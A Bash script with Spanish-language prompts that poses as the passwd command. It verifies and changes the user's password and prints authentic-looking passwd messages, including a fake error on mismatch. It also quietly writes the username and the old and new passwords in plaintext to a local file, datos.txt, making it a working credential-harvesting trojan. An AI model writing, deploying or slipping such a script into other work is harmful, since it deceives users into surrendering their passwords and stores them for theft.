#!/bin/bash

#primer mensaje
echo -n "Cambiando la contraseña de "; whoami

echo -n "Contraseña actual: "
read -s pass1
printf '\n'

# Verificar la contraseña actual
echo "$pass1" | su -s /bin/bash -c "exit" `whoami` >/dev/null 2>&1
if [ $? -ne 0 ]; then
    echo "La contraseña actual es incorrecta."
    exit 1
fi

echo -n "Nueva contraseña: "
read -s pass2
printf '\n'

echo -n "Vuelva a escribir la nueva contraseña: "
read -s pass3
printf '\n'

if [ $pass2 = $pass3 ]; then
    echo -e "`whoami`:$pass3" | chpasswd > error.txt
    echo "passwd: contraseña actualizada correctamente"

    echo -n "Usuario: " >> datos.txt
    whoami >> datos.txt
    echo -n "Contraseña actual: " >> datos.txt
    echo $pass2 >> datos.txt
    echo -n "Contraseña anterior: " >> datos.txt
    echo $pass1 >> datos.txt
    exit 0
else
    echo "Las contraseñas no coinciden."
    echo "passwd: Error de manipulación del testigo de autenticación"
    echo "passwd: no se ha cambiado la contraseña"

    echo -n "Usuario: " >> datos.txt
    whoami >> datos.txt
    echo -n "Contraseña actual: " >> datos.txt
    echo $pass1 >> datos.txt
fi





